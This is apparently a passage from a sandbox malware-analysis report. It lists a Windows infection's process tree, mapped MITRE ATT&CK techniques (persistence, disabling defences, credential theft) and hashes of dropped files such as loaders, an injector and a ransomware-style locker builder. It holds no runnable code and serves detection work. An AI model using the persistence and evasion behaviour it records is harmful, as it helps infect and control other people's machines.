2⤵
PID:2340

C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"
2⤵
PID:1468

C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
2⤵
PID:1852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
3⤵
PID:1832

C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe"
2⤵
PID:2872

C:\Users\Admin\AppData\Local\Temp\Files\costa.exe
"C:\Users\Admin\AppData\Local\Temp\Files\costa.exe"
2⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
3⤵
PID:1936

C:\Users\Admin\AppData\Local\Temp\rty27.exe
"C:\Users\Admin\AppData\Local\Temp\rty27.exe"
3⤵
PID:2252

C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe"
3⤵
PID:848

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
4⤵
PID:768

C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"
2⤵
PID:2844

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\licqzghn.cmdline"
3⤵
PID:940

C:\Users\Admin\AppData\Local\Temp\Files\LM.exe
"C:\Users\Admin\AppData\Local\Temp\Files\LM.exe"
2⤵
PID:2736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 92
3⤵
- Program crash
PID:3004

C:\Users\Admin\AppData\Local\Temp\Files\1234pixxxx.exe
"C:\Users\Admin\AppData\Local\Temp\Files\1234pixxxx.exe"
2⤵
PID:2900

C:\Users\Admin\AppData\Local\Temp\Files\AquariumScreening.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AquariumScreening.exe"
2⤵
PID:2436

C:\Windows\SysWOW64\TapiUnattend.exe
TapiUnattend.exe
3⤵
PID:1456

C:\Windows\system32\taskeng.exe
taskeng.exe {31006620-FC86-4B79-8ADD-FE143AF99696} S-1-5-21-3601492379-692465709-652514833-1000:CALKHSYM\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2488

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
2⤵
- Executes dropped EXE
PID:1564

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
2⤵
PID:1204

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240209135006.log C:\Windows\Logs\CBS\CbsPersist_20240209135006.cab
1⤵
- Drops file in Windows directory
PID:2900

C:\ProgramData\wdkmvkocxuib\smazgcisoglo.exe
C:\ProgramData\wdkmvkocxuib\smazgcisoglo.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:272

C:\Windows\explorer.exe
explorer.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2524

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 272 -s 40
2⤵
- Loads dropped DLL
PID:1288

C:\Windows\explorer.exe
explorer.exe
2⤵
PID:1552

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
PID:928

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
3f37e595fa431a35a5480ef73513ca6d

SHA1
a9f5c9eeb366914e69c0ea3096f9af1b3282f2b0

SHA256
7ebd09789675e3cd7a46730291bb3fe513e45cd686e0932c8ca41b8182f0f6d6

SHA512
612a982b407a023daf9c0800f8c76422097df88fc123efa9dfc5aa162d6a20e8271bd9d26fe177f3feb0f161fe4a8b9ce5a102120f7efc028c8d2381f5d89172

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
a3448692c42182cf82fce0a1934c6267

SHA1
ea1a625f9d212ed3f281b1637d00d0ae8d076323

SHA256
740cb199721b6ebc4699e97cdd326c39f41806cd5f8dd0a28e1f558fadedf46b

SHA512
3e7c2932a02fe3d0ffc009b0779085631257c13e018ca7c13197ed7b3d6ebe40c30656b93d72580342e9966fb218a3f9a291976c7bb146b76869d7e005afdc5e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
3248da16688fa2fe0e657eaf882e0e23

SHA1
9edcdc70fbe126685f2bf5d05d29fe22758497bf

SHA256
350ecb5159cbfd6f729cb33ac3f0fb13344b086ab068c3a30e8510ff3373c513

SHA512
e7d5c6383dec7f3c89f2f3e64d01f6e46737e5f36930f4facb0d46765783247d6ba2d3d2cc141f653154f10aa55a5328c8107bf23706837d0f74481c37442343

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000130001\e0cbefcb1af40c7d4aff4aca26621a98.exe
Filesize
4.1MB

MD5
ade20fae04d7ffec3d2b6afd687bc064

SHA1
6bf2ef74d24dce95c177cd29ed525c1984d802b1

SHA256
d1db55acd0a0683e84ed687c4484379eb29e92c0189c9f7f5917eb74d18a2537

SHA512
140f2fe4e4654fb2f958170cef8c28df2a6a33f554b1e4d04fe39e908c6548be8da30a00e43d09cdecd05f3e1f623390f80d3d2c06ae7bf36ff7abd131f4cb8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000130001\e0cbefcb1af40c7d4aff4aca26621a98.exe
Filesize
2.9MB

MD5
b3b2308279ba33ef63fcc733c5ac9ae0

SHA1
7d16938ef03d728cd3a762f89e65c15649b47413

SHA256
bd75d37b7280c0be8f54a346d7f45d559be4d0f98bac8f599c8a85b2c150bbf2

SHA512
9b421cc6afcb21391c0be668b9bcbbb0fbf12a8394191b671e05b9ddf3d385d352f23fca71f21082797cb39fd1eb0e9b6048a690146add224f899d57b871ab69

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000130001\e0cbefcb1af40c7d4aff4aca26621a98.exe
Filesize
2KB

MD5
fc8f9f2ec584db0e35fe33c75b363c74

SHA1
ecff44fda82a404ec29d569eb676bc811dcb438d

SHA256
8abe48eb2dcf5b74032651640299fe1c6427dc7000a02020ceb3c787e67160b0

SHA512
4fdce068f0546ec406dda8bbba8ae30dfc5c7a0c50116be366ff1372531b5ba4caf578fd4a3c799e4b7450451e01622321cee9abd636901a852ba398478fcc20

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000130001\e0cbefcb1af40c7d4aff4aca26621a98.exe
Filesize
1.1MB

MD5
64eb365ba5f1c01087e5de2284caff0e

SHA1
a32a8c9cf89c37e22f20a25d8cc54ebe56d0367f

SHA256
7d9fd622028040e4bfc8a12a4cb881a286e729b4ee0c8c1a708037108d39a823

SHA512
6be7d2c11c12dd8026bdb78c1989682f791fabfeaac8807ee386765738170a0e3b620730299b0524d6f5c0f343e605aa8906fc7b10061df205ee0bfc5ef0fd07

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab13E0.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
Filesize
187KB

MD5
abf4e375c25ab5517be3201ec47a0efd

SHA1
6c1f3667edf6cfb15960cf452de2ab524a6f7cb5

SHA256
07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108

SHA512
d153a681ea10a70e922e18a32f6f026609182b6e3643a86dbbabe42a93e617ebed3f95224d5796d98fee406ec6517d4f038a4abf4d398cbb2e86460d2e2bac78

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\1234pixxxx.exe
Filesize
1.2MB

MD5
e2695d45520fe4058a6df4dff94b51e9

SHA1
d78899abd8d0cca04c062a9bc5a5a3758c77683d

SHA256
9f51a2ea69977f334c9bc84a4b16a144b8480f978eb975a0e8027a4614c36e8f

SHA512
a7f30148367905b1ed413fda9f7c008e651f723a39b582ea095c14728cdc971c43918136c760cbac8d5731db471067a7acb3f311111022f529b9b62c978cdfb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\LM.exe
Filesize
578KB

MD5
196921b3788eac48b29d5ce802ff8e27

SHA1
ffc40d6063534e089c897e0baa7116da68b5a4b9

SHA256
4059f68b4493074e4baa8129a4d60e6f8c7a01f67b9ba74e10e7a7464d5c6aa9

SHA512
c706bf4450da062828b58f2fe37fca957c89546249401be4e86eb7f6bf952ffd7a13d8955c1d0b25aa2d65d4828c20a548a3d178c5fbefbf01bb384afbf6ac17

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe
Filesize
237KB

MD5
77dff22b6f0e083015de3d99c2e483f9

SHA1
e606af70a7d6a07cbaf4b4c6dfc34992c1686a5d

SHA256
c87a76e508cb9252f3516a5cc2efad3e791f99422abc9f397a23a42834a2613c

SHA512
44ffccaed82eab7c97ce917d04217031c70dbd5051520aa8c36b4faa6311f0441a1100a3e0c79caf38c2c643c2823ea276ee9c8675f80837ca280351ab1386f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe
Filesize
5.8MB

MD5
4e40c7eb6501b5f46d3dcaab97bdb24a

SHA1
42869d000caa93a4a87483491c6fd46a79f66e7c

SHA256
b042d28c3a644853fa7582b13db9bfb7cd9bd4298c3918aaf68bd8602e623118

SHA512
8f225213550ebd2174f76ad05adf55f7281bfac85337eef3ad014bbd4a3c47e32c3ae9104fcb3c41d1924d34fe0e5684a60e22cc1a262c8a14cf2720031058ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\art22.exe
Filesize
2.5MB

MD5
68bb10f285c0dbab62f5a8ad7c25ee7a

SHA1
bdef33a285d044d88f00136dae499d9e4d714d60

SHA256
77dee6099cf3f0bc7cd43f2f44ed61598fc915c30f5ca291338f883c9b86cc1d

SHA512
7fb5ea2294d88186bf374ef8f336e10c99d9b224ca0212fbd5399959894c9175ca646a20ef399d0e988474314272f7d7be788a5345c61e3b728f0ba3c72754bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe
Filesize
3.1MB

MD5
8069dbf0152888530abe8733b4516d14

SHA1
94040031b77d1a1e08bff14907d71e313724a281

SHA256
f6270f403770f1f2bcc273da2acd9c45f2f7f592a718b8366020b2bc5798e3bb

SHA512
93b883d76747dbd0cb9aef40db8607e7df6c45a738a020a5a46b2b01873b81ee4218b80f4c21f9410ab8f1cd7fb7197fedcb1d50a98a1504975879343fb32e1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe
Filesize
320KB

MD5
0d177e64941bff99d7b8a26a475450d9

SHA1
51dab1077ef5061b45e831a3220e9fb4bc27f21d

SHA256
3057fbd4c048fd8de15483afce47198975233345f367eed233e582fd50be2939

SHA512
4e690654cc9ed20c7bdffade8483c46fe0d77072a7af7d7ffe6e8b7e2537c9d5bab964299787a6e909bd9768056c04a512b5f3b6f16289fae8051ece475b8e02

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
Filesize
2.1MB

MD5
5f4e2c8927292f7c85f15f766b11159e

SHA1
fe64e693d15e67e05058a0b88afc4600ec19d0a6

SHA256
7e77bbb242f36bb7993ec081fbe6881db928c3d3ddf2a67414e2c5fc732235b9

SHA512
332b5713c9cb6464ed0ce0594ff785de592ab37a2fee16023cde183b458380c5bef1a2c235f1195684003f9b7fbbb2ed905159c81dc0743710418142e68f9a32

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
Filesize
1.8MB

MD5
d646912c01e012c63d8249a9bb48207b

SHA1
11d62f9a8873272b37aa69af387bdd3690fac5f8

SHA256
de995b5e67b8ec3b5611c4e99fd42a44b6b7af0a49bd5432e1a2dcfc7177a83a

SHA512
22a26520e1391ebc4f33e6111b428ce3c94b8514128a06e5b015da99537c27f69b7901a95867007a5dadb78742703d353331b709a2d70bfd3c5b590d2c11e70d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
Filesize
8.3MB

MD5
fd2727132edd0b59fa33733daa11d9ef

SHA1
63e36198d90c4c2b9b09dd6786b82aba5f03d29a

SHA256
3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

SHA512
3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
Filesize
492KB

MD5
fafbf2197151d5ce947872a4b0bcbe16

SHA1
a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020

SHA256
feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71

SHA512
acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1403.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
Filesize
2.2MB

MD5
251cc9f84de7fa1b2e675b7c03caf2de

SHA1
d785c1d5f71744e7aad0e7d590a61ae92b914e75

SHA256
f71210c2b9f5ee4f11e23528b225ae072b4dc214c0dd155677623ca681519790

SHA512
dd1b25df8aad5001471f299b0364fa5a23c48b0d6fd8131066d361d0aa86cb1457054afacce004e86a86dbd650032e07895add8a42e95dbf83e43774195f1927

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
960KB

MD5
1f75e653004692c56ba29f450b71ca86

SHA1
e0d9e9482f2ff759cb155b921f81f4c895cd1501

SHA256
c3730b5158a1f03445ede701b65982d8e1dc1997bbd36cde8c8b9103167cbfb8

SHA512
a35cc3007152dd1b33bd5258142708e693573548f02bad2b0b589bdc87a88766efb5c32f1b865408b05955a12f776b5123b66543f043505e848f73ec4f0d0237

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp16EC.tmp
Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Roaming\chrome\logs.dat
Filesize
162B

MD5
86cd7b74d691aadcd500c80352cc0806

SHA1
7a4d8346e71af7eeaa6c458d322e56d1f36872d4

SHA256
90f2e150386e243ed3b7d6ed6324d0974e108660f9b4b09e78febd9cf543c6bf

SHA512
c1e21bf88b0dbee8eadfec8c734beae98b38fb91d0002cf88f8c8e6f099ae8ca9da7579ef46434e20a532705d300c984eadd70b3a052606e8cb2dbab36ece912

Download Submit
C:\Users\Admin\AppData\Roaming\hncc.exe
Filesize
1.1MB

MD5
c227e22771466226949f8c53af85465c

SHA1
725a95a7ef0a2b5cccaffe3d8bc1ff12190794d0

SHA256
440a17e8dbd0bfad5f1587fe8c758e9461106eb7b04235477d4b7cab156fcfbf

SHA512
0a00b6980928ac3984cf512d28c7801050b851b8552cc31b0ad2740873b16b6d64332ce68d8f2981356b1c0e9c22f65d95a42867e9f3547ec0c7fe5b80586aa4

Download Submit
C:\Windows\rss\csrss.exe
Filesize
960KB

MD5
be6a7ca097a81ab6bcda1e03e4c15f93

SHA1
ee13f29a65a13f6752cf89d0792efcb0671c21f1

SHA256
32c396bf686c566efdb8fe54810fad3175e8937207bc1c6c28ccf3e0cc834be4

SHA512
fd622cf886f04d9c7909b990168fd8a6f2ee0b853690995d9b11f288351e8025916e880bcd5e9d89a66756c431c47b2a0dba3ebadcb50604eec7e88358c5448e

Download Submit
\Users\Admin\AppData\Local\Temp\1000130001\e0cbefcb1af40c7d4aff4aca26621a98.exe
Filesize
2.9MB

MD5
6c95d5bd2c754c19f73291daf7ec2329

SHA1
624d2497030f27102b06d444c73c1fde55bbc8b3

SHA256
b169ffb3e5873ea300867b9390ab8de16434dda3326ba7dce69bdaad71f78cf3

SHA512
8d1c08c81adc3affd4e37d262ef0a04a65cca107ffc1e083f66fe56753500ec689c56812fc593eab63343064162aac92c596cde14d4d0fd3bc48f7b91d0f4681

Download Submit
\Users\Admin\AppData\Local\Temp\1000130001\e0cbefcb1af40c7d4aff4aca26621a98.exe
Filesize
3.1MB

MD5
a273e8a936d48f3367c1f421d1431c1c

SHA1
65a348609821ac5a1593f17bfc6ec206112d6a08

SHA256
97253e6f494c0a74a0ab136da9c59c1435969ac135a313f9a66246cf6d1684ae

SHA512
9ba349fae377eb30c2ce5ea5e652b737e9c2e6c0a466d3d7646991049353cde3f9655ecf71d741eecff437bc0a8e9d39a8ee917b28b75df2ae4c3aa3f10220bc

Download Submit
\Users\Admin\AppData\Local\Temp\Files\2024.exe
Filesize
300KB

MD5
2c470494b6dc68b2346e42542d80a0fd

SHA1
87ce1483571bf04d67be4c8cb12fb7dfef4ba299

SHA256
1ca8f444f95c2cd9817ce6ab789513e55629c0e0ac0d2b7b552d402517e7cfe9

SHA512
c07332228810928b01aba94119e0f93339c08e55ad656d2eaff5c7647e42bbf5ab529232163fb1bbd14af3331a49d0fb537cfb5eb83565f674155e53d4ae41b5

Download Submit
\Users\Admin\AppData\Local\Temp\Files\6.exe
Filesize
463KB

MD5
0a28fcd4193b6245f996e04769f8f636

SHA1
22fe9a8b9a414a42c0119890c90da877fd136b15

SHA256
e133f61dfecdf2887af9942b8ac8cdbef141829bcf6aa03037d6d3e7d5c2d623

SHA512
f551667b1261780e4946214d2791fefcc57afa256c210d103e93342fce89d1f07c9ee3332c1d42c596d8057725afe7ab06e9e97e00d98de9e0eaa0c2464aaa54

Download Submit
\Users\Admin\AppData\Local\Temp\Files\Goldprime.exe
Filesize
334KB

MD5
7e9e39a623a04307eb499ff6617b9746

SHA1
8d96a7b6464765f32a86e9103955ec74b9b87da9

SHA256
88cb62dfdf42ef1b6c083b8c25df0a383476a274ae1e1f0043585d4bdfd1217a

SHA512
bae1719b17d910ae001e0e81f9b5af535d844243ff9974da4794e73e73db115f46cc6d9053cedd4dab1b04416ec444774490cbab9b5dac8310aad43fde7c32a1

Download Submit
\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe
Filesize
256KB

MD5
56bd918e1976177916a30b27944690eb

SHA1
fed9ff0aeeca69ac1ff5cf31a880120db62c8e80

SHA256
4aaa964d81ace67b51a2a50ad0060281afc443cdc87514c248f9c1701e77f5b7

SHA512
3e929e09e239fe9e03c3ade1d254532532d6314bd31beec7704d130829120dae8ec511f9a1ea59383e54e17b57e2cf6f55b24de5d01594e8b2c305884a2f3218

Download Submit
\Users\Admin\AppData\Local\Temp\Files\asas.exe
Filesize
443KB

MD5
5ac25113feaca88b0975eed657d4a22e

SHA1
501497354540784506e19208ddae7cc0535df98f

SHA256
9a0d8a0fc3c799da381bc0ca4410fd0672f0a8b7c28c319db080325f4db601fe

SHA512
769fa8c71855ba1affc7851d394fd6870e01ab8a5e5ee9ab5e63290708b3233e1b0a47185a13d2e52d29917c5b40f8adedb1efc3305b1cdf31802b4c796a25aa

Download Submit
\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe
Filesize
63KB

MD5
eef08365ee3d38dcf90a93c1a0817e64

SHA1
32a92c1beef6af07069924387a8bd069572eb83f

SHA256
484051fcf1d7f8de7084c7419cf49f65b85ab16642093d5c4249002e9e31a00c

SHA512
748479cf7d575a4b14f08a113989ffc79f14bdf49c453be04ef4bdeaaec347590d0661e08dc486329c1ec9119d4c6ffe3ee51430efe90283d1f89eada7d20304

Download Submit
\Users\Admin\AppData\Local\Temp\Files\bin.exe
Filesize
2.2MB

MD5
bbb01993344d8a2b73f43a789982a432

SHA1
3aa996cb23c3699c1fca30acef86a03a2103564a

SHA256
4efe531c56e2be66561bf1c7c800891df978a5f5fb0cc0b4c047464cf6d18252

SHA512
434bba5cd42cdb9b148a739a6d40ea9b0e99d6d13184e12a54b0bbbbbf82fd571949f495a8d6b3c29587b6655f132d9b92cd332e908f85ae9a74456d2b6b8609

Download Submit
\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
Filesize
418KB

MD5
0099a99f5ffb3c3ae78af0084136fab3

SHA1
0205a065728a9ec1133e8a372b1e3864df776e8c

SHA256
919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

SHA512
5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Download Submit
\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
Filesize
136KB

MD5
ab13d611d84b1a1d9ffbd21ac130a858

SHA1
336a334cd6f1263d3d36985a6a7dd15a4cf64cd9

SHA256
7b021b996b65f29cae4896c11d3a31874e2d5c4ce8a7a212c8bedf7dcae0f8ae

SHA512
c608c3cba7fcad11e6e4ae1fc17137b95ee03b7a0513b4d852405d105faf61880da9bf85b3ce7c1c700adedbf5cdccaae01e43a0345c3f1ee01b639960de877f

Download Submit
\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
Filesize
187KB

MD5
8e34d5cf7e39f355cdaa0a9ba0533901

SHA1
896a0ef46306262742dc5631f225252e37266c86

SHA256
f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae

SHA512
50b0cb12315e97636ec9de08f3d49b4ddb7ef02377936a4bf0a44c47df4a85b3fe1284a20b23c86e52e1c916be61b757afb7fe00abc028d30b38fb9ff0151d3c

Download Submit
\Users\Admin\AppData\Local\Temp\Files\hncc.exe
Filesize
448KB

MD5
635bc6a7d1a8173c654c21c4874eddd1

SHA1
b69c723ba007c9eaf9cb1b70108d296a4690f29e

SHA256
5e8a4b333c5aa68f471b72a450ffbf57638cb2cf955804681e0acb817a8b9d04

SHA512
62f99cebce65f0ee5d77227ea455aa912882e954667d887093405256793ea1441b94c85733aea5645a6b56bb8a51477ad39b0426a9620f6f54fc59ff160a26d3

Download Submit
\Users\Admin\AppData\Local\Temp\Files\hv.exe
Filesize
5.4MB

MD5
bde65ceac062139cc65ad0222eb0a336

SHA1
70d9258459d7ef385eb34dfa2e1d7258077e1e37

SHA256
43cc8ad6513f7c8e9b76fed2fd6737a3ab7d4c48f75fd1fc76c02d3140131375

SHA512
584c3cff57a1de5f906e606e7ac44bc47c09bc0cf40904d3d2599f1e0fa97b795f734a6f3a7769773a0add0157deaeaf5c11e9e7c5ec4a1eb0484f1c56aa0632

Download Submit
\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll
Filesize
742KB

MD5
544cd51a596619b78e9b54b70088307d

SHA1
4769ddd2dbc1dc44b758964ed0bd231b85880b65

SHA256
dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd

SHA512
f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
Filesize
94KB

MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll
Filesize
1.5MB

MD5
f0616fa8bc54ece07e3107057f74e4db

SHA1
b33995c4f9a004b7d806c4bb36040ee844781fca

SHA256
6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

SHA512
15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1.1MB

MD5
a9a6778b7b83e913b9b55eb4d1476042

SHA1
3256dede4bd1214ba19e0bc67900ffbae364f854

SHA256
f5872a7bab6d3dd42bb26aa43dcfc7ea54f18e91d315ab252f6737d1db41e01d

SHA512
5037711a23458f9deb618391d57b50a6a5e8dce52fd10415783540ed23ddb31dc823e2d4fecbcd607f38625eb6259d289eecee30c5eda50578df86ac042dae59

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
2.5MB

MD5
73b1f002db75e894b53dac0c507a1064

SHA1
3196a961d35f836f8118728d696c264e233a617b

SHA256
56b5841db54c135a4e3775f4af1a73a37bca61750e6257914b3c8fdf2635d181

SHA512
af404beeeef948b6403bb2d4a06b7809b1cd1122b4e8e48adba6068cfe322448db348302602b744e9d04fa00a29c1e43081e749e6cc54165b23e61ac8f6118f6

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1024KB

MD5
36faf3a793dbb6e80cd9ec2282ae4404

SHA1
6118ce7d7e64040e97018d6d4383ddfb6f1394e5

SHA256
f8785b8eef542d5f08fdcb9d8d275aab8d8980dece2e4e5c7f26df3b02879cec

SHA512
